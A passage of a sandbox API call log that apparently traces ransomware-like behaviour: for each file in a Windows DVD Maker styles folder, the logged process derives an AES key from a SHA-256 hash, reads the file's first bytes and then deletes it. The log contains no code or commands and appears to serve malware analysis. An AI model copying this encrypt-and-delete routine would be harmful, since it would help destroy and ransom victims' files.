[0153.537] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x609 [0153.537] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.540] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.540] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.540] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.542] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-highlight.png")) returned 0 [0153.554] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.555] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.555] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.555] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.555] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc57 [0153.555] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.557] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.557] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.557] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.558] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-image-inset.png")) returned 0 [0153.559] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.559] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.559] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.559] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.559] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x213d [0153.559] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.563] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.563] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.563] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.564] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-back-static.png")) returned 0 [0153.566] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.567] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.567] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.567] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.567] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1fb8 [0153.567] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.570] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.570] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.570] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.571] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-next-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-next-static.png")) returned 0 [0153.572] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.572] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.572] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.572] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.572] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x20d6 [0153.572] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.576] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.576] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.576] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.577] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-previous-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-previous-static.png")) returned 0 [0153.578] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.578] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.578] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.578] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.578] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c2 [0153.578] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.580] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.580] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.580] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.581] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-bullet.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-bullet.png")) returned 0 [0153.582] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.582] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.582] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.582] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.582] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2cc [0153.582] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.622] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.622] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.622] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.624] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\button-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\button-highlight.png")) returned 0 [0153.625] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.625] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.625] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.625] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.626] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x47c1d [0153.626] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.686] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.686] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.686] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.688] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\content-background.png")) returned 0 [0153.688] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.689] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.689] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.689] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.689] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11276 [0153.689] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.736] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.736] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.736] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.737] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\header-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\header-background.png")) returned 0 [0153.738] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.738] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.738] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.738] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.738] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3126b [0153.739] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.773] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.773] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.773] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.774] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.png")) returned 0 [0153.775] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.775] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.775] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.775] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.775] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10e94 [0153.775] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.837] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.837] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.837] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.839] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport.wmv")) returned 0 [0153.840] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.840] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.840] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.840] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.840] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x58bf8 [0153.841] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.875] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.875] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.875] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.876] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passportcover.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportcover.png")) returned 0 [0153.876] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.877] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.877] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.877] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.877] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7254 [0153.877] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.954] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.954] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.954] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.956] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask.wmv")) returned 0 [0153.956] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.957] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.957] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.957] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.957] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7254 [0153.957] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.961] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.961] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.961] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.963] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask_pal.wmv")) returned 0 [0153.964] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.964] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.964] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.964] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.964] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12b9 [0153.964] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.967] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0153.967] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.967] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.968] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_left.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_left.png")) returned 0 [0153.969] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.970] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.970] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.970] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.970] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12cd [0153.970] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0153.973] CryptDestroyHash (hHash=0x284d528) returned 1 [0153.973] CryptDestroyKey (hKey=0x284d668) returned 1 [0153.973] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0153.974] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\passport_mask_right.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_mask_right.png")) returned 0 [0153.974] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0153.975] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0153.975] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0153.975] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0153.975] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1aaec [0153.975] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.019] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0154.019] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.019] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.022] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Passport_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passport_pal.wmv")) returned 0 [0154.022] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.023] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.023] CryptHashData (hHash=0x284d528, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.023] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.023] GetFileSize (in: hFile=0x454, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18337 [0154.023] ReadFile (in: hFile=0x454, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.030] CryptDestroyHash (hHash=0x284d528) returned 1 [0154.030] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.030] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.032] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\play-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\play-background.png")) returned 0 [0154.032] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.032] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: phHash=0x326a4d0) returned 1 [0154.032] CryptHashData (hHash=0x284d5a8, pbData=0x9f0008, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.033] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326a4c4 | out: phKey=0x326a4c4*=0x284d668) returned 1 [0154.033] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbf1 [0154.033] ReadFile (in: hFile=0x45c, lpBuffer=0x326a544, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326a4d4, lpOverlapped=0x0 | out: lpBuffer=0x326a544*, lpNumberOfBytesRead=0x326a4d4*=0x80, lpOverlapped=0x0) returned 1 [0154.035] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0154.035] CryptDestroyKey (hKey=0x284d668) returned 1 [0154.035] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0154.036] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\selection_subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\selection_subpicture.png")) returned 0 [0154.038] CryptAcquireContextW (in: phProv=0x326a4cc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326a4cc*=0xa52810) returned 1 [0154.038] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326a4d0 | out: 